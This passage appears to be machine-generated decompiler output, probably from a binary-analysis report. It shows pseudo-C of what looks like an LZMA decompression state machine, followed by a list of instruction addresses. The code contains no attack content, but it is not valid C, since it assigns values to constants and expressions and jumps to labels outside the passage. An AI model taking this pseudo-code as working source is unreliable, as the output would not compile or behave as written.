												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00407234
0x00407234
0x00407238
0x0040725d
0x00407267
0x00000000
0x0040723a
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407247
0x0040724b
0x0040724b
0x0040724e
0x00407328
0x00407328
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x004072e6
0x004072e6
0x004072e6
0x00406a82
0x00406a82
0x00406a82
0x00406a8b
0x00000000
0x00000000
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x004072e0
0x004072e0
0x00000000
0x00000000
0x00406bfe
0x00406c00
0x00406c03
0x00406c74
0x00406c77
0x00406c7a
0x00406c81
0x00406c8b
0x00000000
0x00406c8b
0x00406c05
0x00406c09
0x00406c0c
0x00406c0e
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c26
0x00406c2a
0x00406c31
0x00406c34
0x00406c3b
0x00406c3f
0x00406c47
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4b
0x00406c4e
0x00406c6c
0x00406c6e
0x00000000
0x00406c50
0x00406c50
0x00406c53
0x00406c56
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00000000
0x00406c67
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00407408
0x00000000
0x00407408
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbc
0x00406cbf
0x00406cc2
0x00000000
0x00000000
0x00406cc8
0x00406cce
0x00000000
0x00000000
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
